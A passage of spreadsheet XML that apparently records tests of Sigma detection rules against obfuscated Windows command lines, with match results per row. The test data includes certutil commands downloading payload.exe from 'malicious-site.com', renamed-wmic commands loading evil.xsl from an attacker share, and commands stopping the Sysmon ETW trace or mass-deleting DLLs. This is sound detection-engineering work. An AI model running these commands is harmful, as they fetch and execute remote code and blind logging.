      <c r="D1571" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1571" s="43" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1571" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1571" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1571" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1571" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1571" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1571" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1572" ht="15.75" customHeight="1" s="42">
      <c r="A1572" s="36" t="n"/>
      <c r="B1572" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1572" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1572" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1572" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1572" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1572" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1572" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1572" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1572" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1573" ht="15.75" customHeight="1" s="42">
      <c r="A1573" s="43" t="n"/>
      <c r="B1573" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1573" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1573" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1573" s="43" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1573" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1573" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1573" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1573" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1573" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1573" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1574" ht="15.75" customHeight="1" s="42">
      <c r="A1574" s="43" t="n"/>
      <c r="B1574" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1574" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1574" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1574" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1574" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1574" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1574" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1574" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1574" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1574" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1575" ht="15.75" customHeight="1" s="42">
      <c r="A1575" s="36" t="n"/>
      <c r="B1575" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1575" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1575" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1575" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1575" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1575" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1575" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1575" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1575" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1575" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1576" ht="15.75" customHeight="1" s="42">
      <c r="A1576" s="43" t="n"/>
      <c r="B1576" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1576" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1576" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1576" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1576" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1576" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1576" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1576" s="43" t="n"/>
      <c r="J1576" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1576" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1577" ht="15.75" customHeight="1" s="42">
      <c r="A1577" s="43" t="n"/>
      <c r="B1577" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1577" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1577" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1577" s="43" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1577" s="43" t="n"/>
      <c r="J1577" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1578" ht="15.75" customHeight="1" s="42">
      <c r="A1578" s="36" t="n"/>
      <c r="B1578" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1578" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1578" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1578" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1578" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1578" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1578" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1578" s="43" t="n"/>
      <c r="J1578" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1578" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1579" ht="15.75" customHeight="1" s="42">
      <c r="A1579" s="43" t="n"/>
      <c r="B1579" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1579" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1579" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1579" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1579" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1579" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1579" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1579" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1580" ht="15.75" customHeight="1" s="42">
      <c r="A1580" s="43" t="n"/>
      <c r="B1580" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1580" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1580" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1580" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F1580" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1580" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1580" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1580" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1580" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1580" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1581" ht="15.75" customHeight="1" s="42">
      <c r="A1581" s="43" t="n"/>
      <c r="B1581" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1581" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1581" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1581" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F1581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1581" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1581" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1581" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1581" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1582" ht="15.75" customHeight="1" s="42">
      <c r="A1582" s="43" t="n"/>
      <c r="B1582" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1582" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1582" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1582" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F1582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1582" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1582" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1582" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1582" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1583" ht="15.75" customHeight="1" s="42">
      <c r="A1583" s="43" t="n"/>
      <c r="B1583" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1583" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1583" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1583" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F1583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1583" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1583" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1583" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1583" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1584" ht="15.75" customHeight="1" s="42">
      <c r="A1584" s="43" t="n"/>
      <c r="B1584" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1584" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1584" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1584" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1584" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1584" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1584" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1584" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1584" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1584" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1585" ht="15.75" customHeight="1" s="42">
      <c r="A1585" s="43" t="n"/>
      <c r="B1585" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1585" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1585" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1585" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1585" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1585" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1585" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1585" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1585" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1585" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1586" ht="15.75" customHeight="1" s="42">
      <c r="A1586" s="43" t="n"/>
      <c r="B1586" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1586" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1586" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1586" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1586" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1586" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1586" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1586" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1587" ht="15.75" customHeight="1" s="42">
      <c r="A1587" s="43" t="inlineStr">
        <is>
          <t>t1070</t>
        </is>
      </c>
      <c r="B1587" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C1587" s="36" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D1587" s="36" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E1587" s="36" t="inlineStr">
        <is>
          <t>notepad.exe</t>
        </is>
      </c>
      <c r="F1587" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1587" s="43" t="n"/>
      <c r="J1587" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1587" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1588" ht="15.75" customHeight="1" s="42">
      <c r="A1588" s="43" t="inlineStr">
        <is>
          <t>t1070.001</t>
        </is>
      </c>
      <c r="B1588" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C1588" s="36" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D1588" s="36" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E1588" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "logman s^top "SYSMON TRACE" -ets"</t>
        </is>
      </c>
      <c r="F1588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1588" s="43" t="n"/>
      <c r="J1588" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1588" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1589" ht="15.75" customHeight="1" s="42">
      <c r="A1589" s="43" t="n"/>
      <c r="B1589" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_clear</t>
        </is>
      </c>
      <c r="C1589" s="43" t="inlineStr">
        <is>
          <t>Suspicious Eventlog Clearing or Configuration Change Activity</t>
        </is>
      </c>
      <c r="D1589" s="43" t="inlineStr">
        <is>
          <t>cc36992a-4671-4f21-a91d-6c2b72a2edf5</t>
        </is>
      </c>
      <c r="E1589" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Start-Process sl C:\ProgramData\DataExchange,Start</t>
        </is>
      </c>
      <c r="F1589" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1589" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1589" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1589" s="43" t="n"/>
      <c r="J1589" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1589" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1590" ht="15.75" customHeight="1" s="42">
      <c r="A1590" s="43" t="inlineStr">
        <is>
          <t>t1070.004</t>
        </is>
      </c>
      <c r="B1590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_execution</t>
        </is>
      </c>
      <c r="C1590" s="43" t="inlineStr">
        <is>
          <t>File Deletion Via Del</t>
        </is>
      </c>
      <c r="D1590" s="43" t="inlineStr">
        <is>
          <t>379fa130-190e-4c3f-b7bc-6c8e834485f3</t>
        </is>
      </c>
      <c r="E1590" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c del %TEMP%\*.tmp</t>
        </is>
      </c>
      <c r="F1590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1590" s="43" t="n"/>
      <c r="J1590" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1590" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1591" ht="15.75" customHeight="1" s="42">
      <c r="A1591" s="43" t="n"/>
      <c r="B1591" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C1591" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D1591" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E1591" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "d^e^l C:\ProgramData\*.dll"</t>
        </is>
      </c>
      <c r="F1591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1591" s="43" t="n"/>
      <c r="J1591" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1591" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1592" ht="15.75" customHeight="1" s="42">
      <c r="A1592" s="36" t="n"/>
      <c r="B1592" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C1592" s="36" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D1592" s="36" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E1592" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "d^e^l C:\ProgramData\*.dll"</t>
        </is>
      </c>
      <c r="F1592" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1592" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1592" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1592" s="43" t="n"/>
      <c r="J1592" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1592" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1593" ht="15.75" customHeight="1" s="42">
      <c r="A1593" s="43" t="n"/>
      <c r="B1593" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C1593" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D1593" s="43" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E1593" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "set x=del &amp;&amp; %x% C:\ProgramData\*.dll"</t>
        </is>
      </c>
      <c r="F1593" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1593" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1593" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del (204b17ae-4007-471b-917b-b917b315c5db); Greedy File Deletion Using Del (204b17ae-4007-471b-917b-b917b315c5db)</t>
        </is>
      </c>
      <c r="J1593" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1593" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1594" ht="15.75" customHeight="1" s="42">
      <c r="A1594" s="36" t="n"/>
      <c r="B1594" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_del_greedy_deletion</t>
        </is>
      </c>
      <c r="C1594" s="36" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del</t>
        </is>
      </c>
      <c r="D1594" s="36" t="inlineStr">
        <is>
          <t>204b17ae-4007-471b-917b-b917b315c5db</t>
        </is>
      </c>
      <c r="E1594" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set x=del &amp;&amp; %x% C:\ProgramData\*.dll"</t>
        </is>
      </c>
      <c r="F1594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1594" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1594" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1594" s="43" t="inlineStr">
        <is>
          <t>Greedy File Deletion Using Del (204b17ae-4007-471b-917b-b917b315c5db); Greedy File Deletion Using Del (204b17ae-4007-471b-917b-b917b315c5db)</t>
        </is>
      </c>
      <c r="J1594" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1594" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1595" ht="15.75" customHeight="1" s="42">
      <c r="A1595" s="36" t="n"/>
      <c r="B1595" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C1595" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D1595" s="36" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E1595" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "ping -n 1 127.0.0.1 &amp;&amp; copy C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak"</t>
        </is>
      </c>
      <c r="F1595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1595" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1595" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1595" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1595" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1596" ht="15.75" customHeight="1" s="42">
      <c r="A1596" s="36" t="n"/>
      <c r="B1596" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_ping_copy_combined_execution</t>
        </is>
      </c>
      <c r="C1596" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Ping/Copy Command Combination</t>
        </is>
      </c>
      <c r="D1596" s="36" t="inlineStr">
        <is>
          <t>ded2b07a-d12f-4284-9b76-653e37b6c8b0</t>
        </is>
      </c>
      <c r="E1596" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "ping -n 1 127.0.0.1 &amp;&amp; copy C:\Windows\System32\drivers\etc\hosts C:\Temp\hosts.bak"</t>
        </is>
      </c>
      <c r="F1596" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1596" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1596" s="36" t="b">
        <v>0</v>
      </c>
